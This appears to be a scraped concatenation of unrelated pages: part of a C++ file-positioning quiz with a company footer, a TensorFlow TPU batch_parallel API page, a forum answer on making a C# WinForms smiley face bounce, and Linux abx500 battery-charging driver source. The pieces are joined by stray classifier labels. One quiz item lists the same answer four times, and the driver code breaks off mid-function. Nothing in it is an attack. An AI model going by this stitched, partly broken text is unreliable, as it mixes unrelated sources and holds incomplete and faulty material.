Returns true if a file open for reading has reached the next word.
Returns true if a file open for reading has reached the end.
Returns true if a file open for reading has reached the middle.
SHOW ANSWER
Which of the following functions allow to change the location of the get and
put positions ?
sg() and sp()
sekg() and sekp()
gog() and gop()
seekg() and seekp()
SHOW ANSWER
which of the following is used for offset counted from the current position?
ios::curr
ios::cr
ios::cur
ios::current
SHOW ANSWER
Which of the following is used for positioning relative to the beginning of a
stream ?
ios::start
ios::beg
ios::begin
ios::beginning
SHOW ANSWER
Which of the following is used to Open a file for output and move the
read/write control to the end of the file ?
ios::ate
ios::at
ios::ann
ios::end
SHOW ANSWER
Which is correct syntax for, position n bytes back from end of fileObject ?
fileObject.seekg(ios::end, n);
fileObject.seekg(n, ios:end );
fileObject.seekg(n, ios::end );
fileObject.seekg(ios:end, n);
SHOW ANSWER
How to find the position at end of fileObject ?
fileObject.seekg( 0, ios::end );
fileObject.seekg( 0, ios::end );
fileObject.seekg( 0, ios::end );
fileObject.seekg( 0, ios::end );
SHOW ANSWER
BACK | NEXT
TRINITY SOFTWARE SOLUTIONS,IInd floor, Radheyam Towers, Gandhari Amman Kovil Road, Pulimood, Trivandrum - 1
0471-2334855 | 2335855 | 9447387064 | 9847003556 [email protected]
|
__label__pos
| 0.984809 |
tf.compat.v1.tpu.batch_parallel
Shards computation along the batch dimension for parallel execution.
Convenience wrapper around shard().
inputs must be a list of Tensors or None (equivalent to an empty list). Each input is split into num_shards pieces along the 0-th dimension, and computation is applied to each shard in parallel.
Tensors are broadcast to all shards if they are lexically captured by computation. e.g.,
x = tf.constant(7) def computation(): return x + 3 ... = shard(computation, ...)
The outputs from all shards are concatenated back together along their 0-th dimension.
Inputs and outputs of the computation must be at least rank-1 Tensors.
computation A Python function that builds a computation to apply to each shard of the input.
inputs A list of input tensors or None (equivalent to an empty list). The 0-th dimension of each Tensor must have size divisible by num_shards.
num_shards The number of shards.
infeed_queue If not None, the InfeedQueue from which to append a tuple of arguments as inputs to computation.
device_assignment If not None, a DeviceAssignment describing the mapping between logical cores in the computation with physical cores in the TPU topology. Uses a default device assignment if None. The DeviceAssignment may be omitted if each shard of the computation uses only one core, and there is either only one shard, or the number of shards is equal to the number of cores in the TPU system.
name (Deprecated) Does nothing.
A list of output tensors.
ValueError If num_shards <= 0
|
__label__pos
| 0.60542 |
A Brown A Brown - 1 year ago 114
C# Question
Moving Smiling Face C#
Below I've created a program using C# that creates a smiley face. It also moves across the screen. I cannot figure out how to get the smiley face to bounce off the edges and around the screen. Please Help. Thank you.
*/using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace HappyFace
{
public partial class HappyFace : Form
{
int xpos = 0;
int ypos = 0;
int width = 0;
int length = 0;
int startAngle = 45;
int sweepAngle = 90;
public HappyFace()
{
InitializeComponent();
}
private void HappyFace_Load(object sender, EventArgs e)
{
}
private void HappyFace_Paint(object sender, PaintEventArgs e)
{
Graphics g = e.Graphics;
Pen myPen = new Pen(Brushes.Red, 7);
Pen myPen2 = new Pen(Brushes.Green, 7);
//g.DrawLine(myPen, 0, 0, 500, 500);
//g.DrawLine(myPen, 0, 0, this.ClientRectangle.Width, this.ClientRectangle.Height);
//g.DrawLine(myPen2, 0, this.ClientRectangle.Height, this.ClientRectangle.Width, 0);
//g.DrawLine(myPen2, this.ClientRectangle.Left, this.ClientRectangle.Bottom, this.ClientRectangle.Right, ClientRectangle.Top);
int endX = this.ClientRectangle.Width;
int endY = this.ClientRectangle.Height;
//string msg = String.Format("endX = {0} endY = {1}", endX, endY);
//MessageBox.Show(msg);
int xCenter = this.ClientRectangle.Left + (this.ClientRectangle.Width / 2);
int yCenter = this.ClientRectangle.Top + (this.ClientRectangle.Height / 2);
Pen circlePen = new Pen(Brushes.Black, 9);
//g.DrawEllipse(circlePen, xCenter - 50, yCenter - 50, 100, 100);
// g.FillEllipse(Brushes.Orange, xCenter -50, yCenter - 50, 100, 100);
Font myFont = new Font("Monotype Corsiva", 43, FontStyle.Bold);
g.DrawString("Happy Face", myFont, Brushes.Aqua, 300, 25);
//g.DrawArc(circlePen, xpos, width, length, startAngle, sweepAngle);
g.DrawEllipse(circlePen, xpos, ypos + 130, 250, 250);
g.FillEllipse(Brushes.PeachPuff, xpos, ypos + 130, 250, 250);
g.DrawEllipse(circlePen, xpos + 65, ypos + 200, 20, 35);
g.FillEllipse(Brushes.Black, xpos + 65, ypos + 200, 20, 35);
g.DrawEllipse(circlePen, xpos + 160, ypos + 200, 20, 35);
g.FillEllipse(Brushes.Black, xpos + 160, ypos + 200, 20, 35);
g.DrawArc(circlePen, xpos + 60, ypos + 215, 130, 120, 35, 115);
}
private void timer1_Tick(object sender, EventArgs e)
{
xpos = xpos + 3;
if(xpos >= this.ClientRectangle.Right - 250)
{
xpos = 0;
}
this.Invalidate();
}
}
}*/
Answer Source
Well, I was a bit bored. I'll assume that the object is going to move in a 45 degrees trajectory,and that when it collides with the bounds it would change by 90º.
What I would do (this is a very simple solution) is, first of all, define the direction in both axes in which i want the "smiley" to move,the step in each timer tick, the position of the center and the size of the object, something like:
int xpos = 0;
int ypos = 130;
int step = 10;
int width = 250;
int height = 250;
int directionX = +1;
int directionY = -1;
The timer would just increase the x and y positions:
private void timer1_Tick(object sender, EventArgs e)
{
xpos += 10*directionX;
ypos += 10*directionY;
checkBounds(); //This would check if the object collides with the bounds
this.Invalidate();
}
The checkBounds method check if the object collides with the bounds:
private void checkBounds()
{
if (ypos < 0 + step || ypos + height+ step > ClientRectangle.Height)
{
directionY *= -1;
}
if (xpos < 0 + step || xpos + width + step > ClientRectangle.Width)
{
directionX *= -1;
}
}
Finally, the Paint method is similar to yours, just adjusting some values:
private void Form2_Paint(object sender, PaintEventArgs e)
{
Graphics g = e.Graphics;
Pen myPen = new Pen(Brushes.Red, 7);
Pen myPen2 = new Pen(Brushes.Green, 7);
int endX = this.ClientRectangle.Width;
int endY = this.ClientRectangle.Height;
int xCenter = this.ClientRectangle.Left + (this.ClientRectangle.Width / 2);
int yCenter = this.ClientRectangle.Top + (this.ClientRectangle.Height / 2);
Pen circlePen = new Pen(Brushes.Black, 9);
Font myFont = new Font("Monotype Corsiva", 43, FontStyle.Bold);
g.DrawString("Happy Face", myFont, Brushes.Aqua, 300, 25);
g.DrawEllipse(circlePen, xpos, ypos, 250, 250);
g.FillEllipse(Brushes.PeachPuff, xpos, ypos, 250, 250);
g.DrawEllipse(circlePen, xpos + 65, ypos -130 + 200, 20, 35);
g.FillEllipse(Brushes.Black, xpos + 65, ypos-130 + 200, 20, 35);
g.DrawEllipse(circlePen, xpos + 160, ypos-130 + 200, 20, 35);
g.FillEllipse(Brushes.Black, xpos + 160, ypos-130 + 200, 20, 35);
g.DrawArc(circlePen, xpos + 60, ypos-130 + 215, 130, 120, 35, 115);
}
This code could be highly improved, but this may help you think how it should be done. Hope it helps.
Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download
|
__label__pos
| 0.969581 |
Version: 2.0.40 2.2.26 2.4.37 3.11 3.12 3.13 3.14 3.15 3.16 3.17 3.18 3.19 4.0 4.1 4.2 4.3 4.4 4.5 4.6 4.7 4.8
Linux/drivers/power/abx500_chargalg.c
1 /*
2 * Copyright (C) ST-Ericsson SA 2012
3 * Copyright (c) 2012 Sony Mobile Communications AB
4 *
5 * Charging algorithm driver for abx500 variants
6 *
7 * License Terms: GNU General Public License v2
8 * Authors:
9 * Johan Palsson <[email protected]>
10 * Karl Komierowski <[email protected]>
11 * Arun R Murthy <[email protected]>
12 * Author: Imre Sunyi <[email protected]>
13 */
14
15 #include <linux/init.h>
16 #include <linux/module.h>
17 #include <linux/device.h>
18 #include <linux/hrtimer.h>
19 #include <linux/interrupt.h>
20 #include <linux/delay.h>
21 #include <linux/slab.h>
22 #include <linux/platform_device.h>
23 #include <linux/power_supply.h>
24 #include <linux/completion.h>
25 #include <linux/workqueue.h>
26 #include <linux/kobject.h>
27 #include <linux/of.h>
28 #include <linux/mfd/core.h>
29 #include <linux/mfd/abx500.h>
30 #include <linux/mfd/abx500/ab8500.h>
31 #include <linux/mfd/abx500/ux500_chargalg.h>
32 #include <linux/mfd/abx500/ab8500-bm.h>
33 #include <linux/notifier.h>
34
35 /* Watchdog kick interval */
36 #define CHG_WD_INTERVAL (6 * HZ)
37
38 /* End-of-charge criteria counter */
39 #define EOC_COND_CNT 10
40
41 /* One hour expressed in seconds */
42 #define ONE_HOUR_IN_SECONDS 3600
43
44 /* Five minutes expressed in seconds */
45 #define FIVE_MINUTES_IN_SECONDS 300
46
47 /* Plus margin for the low battery threshold */
48 #define BAT_PLUS_MARGIN (100)
49
50 #define CHARGALG_CURR_STEP_LOW 0
51 #define CHARGALG_CURR_STEP_HIGH 100
52
53 enum abx500_chargers {
54 NO_CHG,
55 AC_CHG,
56 USB_CHG,
57 };
58
59 struct abx500_chargalg_charger_info {
60 enum abx500_chargers conn_chg;
61 enum abx500_chargers prev_conn_chg;
62 enum abx500_chargers online_chg;
63 enum abx500_chargers prev_online_chg;
64 enum abx500_chargers charger_type;
65 bool usb_chg_ok;
66 bool ac_chg_ok;
67 int usb_volt;
68 int usb_curr;
69 int ac_volt;
70 int ac_curr;
71 int usb_vset;
72 int usb_iset;
73 int ac_vset;
74 int ac_iset;
75 };
76
77 struct abx500_chargalg_suspension_status {
78 bool suspended_change;
79 bool ac_suspended;
80 bool usb_suspended;
81 };
82
83 struct abx500_chargalg_current_step_status {
84 bool curr_step_change;
85 int curr_step;
86 };
87
88 struct abx500_chargalg_battery_data {
89 int temp;
90 int volt;
91 int avg_curr;
92 int inst_curr;
93 int percent;
94 };
95
96 enum abx500_chargalg_states {
97 STATE_HANDHELD_INIT,
98 STATE_HANDHELD,
99 STATE_CHG_NOT_OK_INIT,
100 STATE_CHG_NOT_OK,
101 STATE_HW_TEMP_PROTECT_INIT,
102 STATE_HW_TEMP_PROTECT,
103 STATE_NORMAL_INIT,
104 STATE_USB_PP_PRE_CHARGE,
105 STATE_NORMAL,
106 STATE_WAIT_FOR_RECHARGE_INIT,
107 STATE_WAIT_FOR_RECHARGE,
108 STATE_MAINTENANCE_A_INIT,
109 STATE_MAINTENANCE_A,
110 STATE_MAINTENANCE_B_INIT,
111 STATE_MAINTENANCE_B,
112 STATE_TEMP_UNDEROVER_INIT,
113 STATE_TEMP_UNDEROVER,
114 STATE_TEMP_LOWHIGH_INIT,
115 STATE_TEMP_LOWHIGH,
116 STATE_SUSPENDED_INIT,
117 STATE_SUSPENDED,
118 STATE_OVV_PROTECT_INIT,
119 STATE_OVV_PROTECT,
120 STATE_SAFETY_TIMER_EXPIRED_INIT,
121 STATE_SAFETY_TIMER_EXPIRED,
122 STATE_BATT_REMOVED_INIT,
123 STATE_BATT_REMOVED,
124 STATE_WD_EXPIRED_INIT,
125 STATE_WD_EXPIRED,
126 };
127
128 static const char *states[] = {
129 "HANDHELD_INIT",
130 "HANDHELD",
131 "CHG_NOT_OK_INIT",
132 "CHG_NOT_OK",
133 "HW_TEMP_PROTECT_INIT",
134 "HW_TEMP_PROTECT",
135 "NORMAL_INIT",
136 "USB_PP_PRE_CHARGE",
137 "NORMAL",
138 "WAIT_FOR_RECHARGE_INIT",
139 "WAIT_FOR_RECHARGE",
140 "MAINTENANCE_A_INIT",
141 "MAINTENANCE_A",
142 "MAINTENANCE_B_INIT",
143 "MAINTENANCE_B",
144 "TEMP_UNDEROVER_INIT",
145 "TEMP_UNDEROVER",
146 "TEMP_LOWHIGH_INIT",
147 "TEMP_LOWHIGH",
148 "SUSPENDED_INIT",
149 "SUSPENDED",
150 "OVV_PROTECT_INIT",
151 "OVV_PROTECT",
152 "SAFETY_TIMER_EXPIRED_INIT",
153 "SAFETY_TIMER_EXPIRED",
154 "BATT_REMOVED_INIT",
155 "BATT_REMOVED",
156 "WD_EXPIRED_INIT",
157 "WD_EXPIRED",
158 };
159
160 struct abx500_chargalg_events {
161 bool batt_unknown;
162 bool mainextchnotok;
163 bool batt_ovv;
164 bool batt_rem;
165 bool btemp_underover;
166 bool btemp_lowhigh;
167 bool main_thermal_prot;
168 bool usb_thermal_prot;
169 bool main_ovv;
170 bool vbus_ovv;
171 bool usbchargernotok;
172 bool safety_timer_expired;
173 bool maintenance_timer_expired;
174 bool ac_wd_expired;
175 bool usb_wd_expired;
176 bool ac_cv_active;
177 bool usb_cv_active;
178 bool vbus_collapsed;
179 };
180
181 /**
182 * struct abx500_charge_curr_maximization - Charger maximization parameters
183 * @original_iset: the non optimized/maximised charger current
184 * @current_iset: the charging current used at this moment
185 * @test_delta_i: the delta between the current we want to charge and the
186 current that is really going into the battery
187 * @condition_cnt: number of iterations needed before a new charger current
188 is set
189 * @max_current: maximum charger current
190 * @wait_cnt: to avoid too fast current step down in case of charger
191 * voltage collapse, we insert this delay between step
192 * down
193 * @level: tells in how many steps the charging current has been
194 increased
195 */
196 struct abx500_charge_curr_maximization {
197 int original_iset;
198 int current_iset;
199 int test_delta_i;
200 int condition_cnt;
201 int max_current;
202 int wait_cnt;
203 u8 level;
204 };
205
206 enum maxim_ret {
207 MAXIM_RET_NOACTION,
208 MAXIM_RET_CHANGE,
209 MAXIM_RET_IBAT_TOO_HIGH,
210 };
211
212 /**
213 * struct abx500_chargalg - abx500 Charging algorithm device information
214 * @dev: pointer to the structure device
215 * @charge_status: battery operating status
216 * @eoc_cnt: counter used to determine end-of_charge
217 * @maintenance_chg: indicate if maintenance charge is active
218 * @t_hyst_norm temperature hysteresis when the temperature has been
219 * over or under normal limits
220 * @t_hyst_lowhigh temperature hysteresis when the temperature has been
221 * over or under the high or low limits
222 * @charge_state: current state of the charging algorithm
223 * @ccm charging current maximization parameters
224 * @chg_info: information about connected charger types
225 * @batt_data: data of the battery
226 * @susp_status: current charger suspension status
227 * @bm: Platform specific battery management information
228 * @curr_status: Current step status for over-current protection
229 * @parent: pointer to the struct abx500
230 * @chargalg_psy: structure that holds the battery properties exposed by
231 * the charging algorithm
232 * @events: structure for information about events triggered
233 * @chargalg_wq: work queue for running the charging algorithm
234 * @chargalg_periodic_work: work to run the charging algorithm periodically
235 * @chargalg_wd_work: work to kick the charger watchdog periodically
236 * @chargalg_work: work to run the charging algorithm instantly
237 * @safety_timer: charging safety timer
238 * @maintenance_timer: maintenance charging timer
239 * @chargalg_kobject: structure of type kobject
240 */
241 struct abx500_chargalg {
242 struct device *dev;
243 int charge_status;
244 int eoc_cnt;
245 bool maintenance_chg;
246 int t_hyst_norm;
247 int t_hyst_lowhigh;
248 enum abx500_chargalg_states charge_state;
249 struct abx500_charge_curr_maximization ccm;
250 struct abx500_chargalg_charger_info chg_info;
251 struct abx500_chargalg_battery_data batt_data;
252 struct abx500_chargalg_suspension_status susp_status;
253 struct ab8500 *parent;
254 struct abx500_chargalg_current_step_status curr_status;
255 struct abx500_bm_data *bm;
256 struct power_supply *chargalg_psy;
257 struct ux500_charger *ac_chg;
258 struct ux500_charger *usb_chg;
259 struct abx500_chargalg_events events;
260 struct workqueue_struct *chargalg_wq;
261 struct delayed_work chargalg_periodic_work;
262 struct delayed_work chargalg_wd_work;
263 struct work_struct chargalg_work;
264 struct hrtimer safety_timer;
265 struct hrtimer maintenance_timer;
266 struct kobject chargalg_kobject;
267 };
268
269 /*External charger prepare notifier*/
270 BLOCKING_NOTIFIER_HEAD(charger_notifier_list);
271
272 /* Main battery properties */
273 static enum power_supply_property abx500_chargalg_props[] = {
274 POWER_SUPPLY_PROP_STATUS,
275 POWER_SUPPLY_PROP_HEALTH,
276 };
277
278 struct abx500_chargalg_sysfs_entry {
279 struct attribute attr;
280 ssize_t (*show)(struct abx500_chargalg *, char *);
281 ssize_t (*store)(struct abx500_chargalg *, const char *, size_t);
282 };
283
284 /**
285 * abx500_chargalg_safety_timer_expired() - Expiration of the safety timer
286 * @timer: pointer to the hrtimer structure
287 *
288 * This function gets called when the safety timer for the charger
289 * expires
290 */
291 static enum hrtimer_restart
292 abx500_chargalg_safety_timer_expired(struct hrtimer *timer)
293 {
294 struct abx500_chargalg *di = container_of(timer, struct abx500_chargalg,
295 safety_timer);
296 dev_err(di->dev, "Safety timer expired\n");
297 di->events.safety_timer_expired = true;
298
299 /* Trigger execution of the algorithm instantly */
300 queue_work(di->chargalg_wq, &di->chargalg_work);
301
302 return HRTIMER_NORESTART;
303 }
304
305 /**
306 * abx500_chargalg_maintenance_timer_expired() - Expiration of
307 * the maintenance timer
308 * @timer: pointer to the timer structure
309 *
310 * This function gets called when the maintenence timer
311 * expires
312 */
313 static enum hrtimer_restart
314 abx500_chargalg_maintenance_timer_expired(struct hrtimer *timer)
315 {
316
317 struct abx500_chargalg *di = container_of(timer, struct abx500_chargalg,
318 maintenance_timer);
319
320 dev_dbg(di->dev, "Maintenance timer expired\n");
321 di->events.maintenance_timer_expired = true;
322
323 /* Trigger execution of the algorithm instantly */
324 queue_work(di->chargalg_wq, &di->chargalg_work);
325
326 return HRTIMER_NORESTART;
327 }
328
329 /**
330 * abx500_chargalg_state_to() - Change charge state
331 * @di: pointer to the abx500_chargalg structure
332 *
333 * This function gets called when a charge state change should occur
334 */
335 static void abx500_chargalg_state_to(struct abx500_chargalg *di,
336 enum abx500_chargalg_states state)
337 {
338 dev_dbg(di->dev,
339 "State changed: %s (From state: [%d] %s =to=> [%d] %s )\n",
340 di->charge_state == state ? "NO" : "YES",
341 di->charge_state,
342 states[di->charge_state],
343 state,
344 states[state]);
345
346 di->charge_state = state;
347 }
348
349 static int abx500_chargalg_check_charger_enable(struct abx500_chargalg *di)
350 {
351 switch (di->charge_state) {
352 case STATE_NORMAL:
353 case STATE_MAINTENANCE_A:
354 case STATE_MAINTENANCE_B:
355 break;
356 default:
357 return 0;
358 }
359
360 if (di->chg_info.charger_type & USB_CHG) {
361 return di->usb_chg->ops.check_enable(di->usb_chg,
362 di->bm->bat_type[di->bm->batt_id].normal_vol_lvl,
363 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl);
364 } else if ((di->chg_info.charger_type & AC_CHG) &&
365 !(di->ac_chg->external)) {
366 return di->ac_chg->ops.check_enable(di->ac_chg,
367 di->bm->bat_type[di->bm->batt_id].normal_vol_lvl,
368 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl);
369 }
370 return 0;
371 }
372
373 /**
374 * abx500_chargalg_check_charger_connection() - Check charger connection change
375 * @di: pointer to the abx500_chargalg structure
376 *
377 * This function will check if there is a change in the charger connection
378 * and change charge state accordingly. AC has precedence over USB.
379 */
380 static int abx500_chargalg_check_charger_connection(struct abx500_chargalg *di)
381 {
382 if (di->chg_info.conn_chg != di->chg_info.prev_conn_chg ||
383 di->susp_status.suspended_change) {
384 /*
385 * Charger state changed or suspension
386 * has changed since last update
387 */
388 if ((di->chg_info.conn_chg & AC_CHG) &&
389 !di->susp_status.ac_suspended) {
390 dev_dbg(di->dev, "Charging source is AC\n");
391 if (di->chg_info.charger_type != AC_CHG) {
392 di->chg_info.charger_type = AC_CHG;
393 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
394 }
395 } else if ((di->chg_info.conn_chg & USB_CHG) &&
396 !di->susp_status.usb_suspended) {
397 dev_dbg(di->dev, "Charging source is USB\n");
398 di->chg_info.charger_type = USB_CHG;
399 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
400 } else if (di->chg_info.conn_chg &&
401 (di->susp_status.ac_suspended ||
402 di->susp_status.usb_suspended)) {
403 dev_dbg(di->dev, "Charging is suspended\n");
404 di->chg_info.charger_type = NO_CHG;
405 abx500_chargalg_state_to(di, STATE_SUSPENDED_INIT);
406 } else {
407 dev_dbg(di->dev, "Charging source is OFF\n");
408 di->chg_info.charger_type = NO_CHG;
409 abx500_chargalg_state_to(di, STATE_HANDHELD_INIT);
410 }
411 di->chg_info.prev_conn_chg = di->chg_info.conn_chg;
412 di->susp_status.suspended_change = false;
413 }
414 return di->chg_info.conn_chg;
415 }
416
417 /**
418 * abx500_chargalg_check_current_step_status() - Check charging current
419 * step status.
420 * @di: pointer to the abx500_chargalg structure
421 *
422 * This function will check if there is a change in the charging current step
423 * and change charge state accordingly.
424 */
425 static void abx500_chargalg_check_current_step_status
426 (struct abx500_chargalg *di)
427 {
428 if (di->curr_status.curr_step_change)
429 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
430 di->curr_status.curr_step_change = false;
431 }
432
433 /**
434 * abx500_chargalg_start_safety_timer() - Start charging safety timer
435 * @di: pointer to the abx500_chargalg structure
436 *
437 * The safety timer is used to avoid overcharging of old or bad batteries.
438 * There are different timers for AC and USB
439 */
440 static void abx500_chargalg_start_safety_timer(struct abx500_chargalg *di)
441 {
442 /* Charger-dependent expiration time in hours*/
443 int timer_expiration = 0;
444
445 switch (di->chg_info.charger_type) {
446 case AC_CHG:
447 timer_expiration = di->bm->main_safety_tmr_h;
448 break;
449
450 case USB_CHG:
451 timer_expiration = di->bm->usb_safety_tmr_h;
452 break;
453
454 default:
455 dev_err(di->dev, "Unknown charger to charge from\n");
456 break;
457 }
458
459 di->events.safety_timer_expired = false;
460 hrtimer_set_expires_range(&di->safety_timer,
461 ktime_set(timer_expiration * ONE_HOUR_IN_SECONDS, 0),
462 ktime_set(FIVE_MINUTES_IN_SECONDS, 0));
463 hrtimer_start_expires(&di->safety_timer, HRTIMER_MODE_REL);
464 }
465
466 /**
467 * abx500_chargalg_stop_safety_timer() - Stop charging safety timer
468 * @di: pointer to the abx500_chargalg structure
469 *
470 * The safety timer is stopped whenever the NORMAL state is exited
471 */
472 static void abx500_chargalg_stop_safety_timer(struct abx500_chargalg *di)
473 {
474 if (hrtimer_try_to_cancel(&di->safety_timer) >= 0)
475 di->events.safety_timer_expired = false;
476 }
477
478 /**
479 * abx500_chargalg_start_maintenance_timer() - Start charging maintenance timer
480 * @di: pointer to the abx500_chargalg structure
481 * @duration: duration of ther maintenance timer in hours
482 *
483 * The maintenance timer is used to maintain the charge in the battery once
484 * the battery is considered full. These timers are chosen to match the
485 * discharge curve of the battery
486 */
487 static void abx500_chargalg_start_maintenance_timer(struct abx500_chargalg *di,
488 int duration)
489 {
490 hrtimer_set_expires_range(&di->maintenance_timer,
491 ktime_set(duration * ONE_HOUR_IN_SECONDS, 0),
492 ktime_set(FIVE_MINUTES_IN_SECONDS, 0));
493 di->events.maintenance_timer_expired = false;
494 hrtimer_start_expires(&di->maintenance_timer, HRTIMER_MODE_REL);
495 }
496
497 /**
498 * abx500_chargalg_stop_maintenance_timer() - Stop maintenance timer
499 * @di: pointer to the abx500_chargalg structure
500 *
501 * The maintenance timer is stopped whenever maintenance ends or when another
502 * state is entered
503 */
504 static void abx500_chargalg_stop_maintenance_timer(struct abx500_chargalg *di)
505 {
506 if (hrtimer_try_to_cancel(&di->maintenance_timer) >= 0)
507 di->events.maintenance_timer_expired = false;
508 }
509
510 /**
511 * abx500_chargalg_kick_watchdog() - Kick charger watchdog
512 * @di: pointer to the abx500_chargalg structure
513 *
514 * The charger watchdog have to be kicked periodically whenever the charger is
515 * on, else the ABB will reset the system
516 */
517 static int abx500_chargalg_kick_watchdog(struct abx500_chargalg *di)
518 {
519 /* Check if charger exists and kick watchdog if charging */
520 if (di->ac_chg && di->ac_chg->ops.kick_wd &&
521 di->chg_info.online_chg & AC_CHG) {
522 /*
523 * If AB charger watchdog expired, pm2xxx charging
524 * gets disabled. To be safe, kick both AB charger watchdog
525 * and pm2xxx watchdog.
526 */
527 if (di->ac_chg->external &&
528 di->usb_chg && di->usb_chg->ops.kick_wd)
529 di->usb_chg->ops.kick_wd(di->usb_chg);
530
531 return di->ac_chg->ops.kick_wd(di->ac_chg);
532 }
533 else if (di->usb_chg && di->usb_chg->ops.kick_wd &&
534 di->chg_info.online_chg & USB_CHG)
535 return di->usb_chg->ops.kick_wd(di->usb_chg);
536
537 return -ENXIO;
538 }
539
540 /**
541 * abx500_chargalg_ac_en() - Turn on/off the AC charger
542 * @di: pointer to the abx500_chargalg structure
543 * @enable: charger on/off
544 * @vset: requested charger output voltage
545 * @iset: requested charger output current
546 *
547 * The AC charger will be turned on/off with the requested charge voltage and
548 * current
549 */
550 static int abx500_chargalg_ac_en(struct abx500_chargalg *di, int enable,
551 int vset, int iset)
552 {
553 static int abx500_chargalg_ex_ac_enable_toggle;
554
555 if (!di->ac_chg || !di->ac_chg->ops.enable)
556 return -ENXIO;
557
558 /* Select maximum of what both the charger and the battery supports */
559 if (di->ac_chg->max_out_volt)
560 vset = min(vset, di->ac_chg->max_out_volt);
561 if (di->ac_chg->max_out_curr)
562 iset = min(iset, di->ac_chg->max_out_curr);
563
564 di->chg_info.ac_iset = iset;
565 di->chg_info.ac_vset = vset;
566
567 /* Enable external charger */
568 if (enable && di->ac_chg->external &&
569 !abx500_chargalg_ex_ac_enable_toggle) {
570 blocking_notifier_call_chain(&charger_notifier_list,
571 0, di->dev);
572 abx500_chargalg_ex_ac_enable_toggle++;
573 }
574
575 return di->ac_chg->ops.enable(di->ac_chg, enable, vset, iset);
576 }
577
578 /**
579 * abx500_chargalg_usb_en() - Turn on/off the USB charger
580 * @di: pointer to the abx500_chargalg structure
581 * @enable: charger on/off
582 * @vset: requested charger output voltage
583 * @iset: requested charger output current
584 *
585 * The USB charger will be turned on/off with the requested charge voltage and
586 * current
587 */
588 static int abx500_chargalg_usb_en(struct abx500_chargalg *di, int enable,
589 int vset, int iset)
590 {
591 if (!di->usb_chg || !di->usb_chg->ops.enable)
592 return -ENXIO;
593
594 /* Select maximum of what both the charger and the battery supports */
595 if (di->usb_chg->max_out_volt)
596 vset = min(vset, di->usb_chg->max_out_volt);
597 if (di->usb_chg->max_out_curr)
598 iset = min(iset, di->usb_chg->max_out_curr);
599
600 di->chg_info.usb_iset = iset;
601 di->chg_info.usb_vset = vset;
602
603 return di->usb_chg->ops.enable(di->usb_chg, enable, vset, iset);
604 }
605
606 /**
607 * ab8540_chargalg_usb_pp_en() - Enable/ disable USB power path
608 * @di: pointer to the abx500_chargalg structure
609 * @enable: power path enable/disable
610 *
611 * The USB power path will be enable/ disable
612 */
613 static int ab8540_chargalg_usb_pp_en(struct abx500_chargalg *di, bool enable)
614 {
615 if (!di->usb_chg || !di->usb_chg->ops.pp_enable)
616 return -ENXIO;
617
618 return di->usb_chg->ops.pp_enable(di->usb_chg, enable);
619 }
620
621 /**
622 * ab8540_chargalg_usb_pre_chg_en() - Enable/ disable USB pre-charge
623 * @di: pointer to the abx500_chargalg structure
624 * @enable: USB pre-charge enable/disable
625 *
626 * The USB USB pre-charge will be enable/ disable
627 */
628 static int ab8540_chargalg_usb_pre_chg_en(struct abx500_chargalg *di,
629 bool enable)
630 {
631 if (!di->usb_chg || !di->usb_chg->ops.pre_chg_enable)
632 return -ENXIO;
633
634 return di->usb_chg->ops.pre_chg_enable(di->usb_chg, enable);
635 }
636
637 /**
638 * abx500_chargalg_update_chg_curr() - Update charger current
639 * @di: pointer to the abx500_chargalg structure
640 * @iset: requested charger output current
641 *
642 * The charger output current will be updated for the charger
643 * that is currently in use
644 */
645 static int abx500_chargalg_update_chg_curr(struct abx500_chargalg *di,
646 int iset)
647 {
648 /* Check if charger exists and update current if charging */
649 if (di->ac_chg && di->ac_chg->ops.update_curr &&
650 di->chg_info.charger_type & AC_CHG) {
651 /*
652 * Select maximum of what both the charger
653 * and the battery supports
654 */
655 if (di->ac_chg->max_out_curr)
656 iset = min(iset, di->ac_chg->max_out_curr);
657
658 di->chg_info.ac_iset = iset;
659
660 return di->ac_chg->ops.update_curr(di->ac_chg, iset);
661 } else if (di->usb_chg && di->usb_chg->ops.update_curr &&
662 di->chg_info.charger_type & USB_CHG) {
663 /*
664 * Select maximum of what both the charger
665 * and the battery supports
666 */
667 if (di->usb_chg->max_out_curr)
668 iset = min(iset, di->usb_chg->max_out_curr);
669
670 di->chg_info.usb_iset = iset;
671
672 return di->usb_chg->ops.update_curr(di->usb_chg, iset);
673 }
674
675 return -ENXIO;
676 }
677
678 /**
679 * abx500_chargalg_stop_charging() - Stop charging
680 * @di: pointer to the abx500_chargalg structure
681 *
682 * This function is called from any state where charging should be stopped.
683 * All charging is disabled and all status parameters and timers are changed
684 * accordingly
685 */
686 static void abx500_chargalg_stop_charging(struct abx500_chargalg *di)
687 {
688 abx500_chargalg_ac_en(di, false, 0, 0);
689 abx500_chargalg_usb_en(di, false, 0, 0);
690 abx500_chargalg_stop_safety_timer(di);
691 abx500_chargalg_stop_maintenance_timer(di);
692 di->charge_status = POWER_SUPPLY_STATUS_NOT_CHARGING;
693 di->maintenance_chg = false;
694 cancel_delayed_work(&di->chargalg_wd_work);
695 power_supply_changed(di->chargalg_psy);
696 }
697
698 /**
699 * abx500_chargalg_hold_charging() - Pauses charging
700 * @di: pointer to the abx500_chargalg structure
701 *
702 * This function is called in the case where maintenance charging has been
703 * disabled and instead a battery voltage mode is entered to check when the
704 * battery voltage has reached a certain recharge voltage
705 */
706 static void abx500_chargalg_hold_charging(struct abx500_chargalg *di)
707 {
708 abx500_chargalg_ac_en(di, false, 0, 0);
709 abx500_chargalg_usb_en(di, false, 0, 0);
710 abx500_chargalg_stop_safety_timer(di);
711 abx500_chargalg_stop_maintenance_timer(di);
712 di->charge_status = POWER_SUPPLY_STATUS_CHARGING;
713 di->maintenance_chg = false;
714 cancel_delayed_work(&di->chargalg_wd_work);
715 power_supply_changed(di->chargalg_psy);
716 }
717
718 /**
719 * abx500_chargalg_start_charging() - Start the charger
720 * @di: pointer to the abx500_chargalg structure
721 * @vset: requested charger output voltage
722 * @iset: requested charger output current
723 *
724 * A charger will be enabled depending on the requested charger type that was
725 * detected previously.
726 */
727 static void abx500_chargalg_start_charging(struct abx500_chargalg *di,
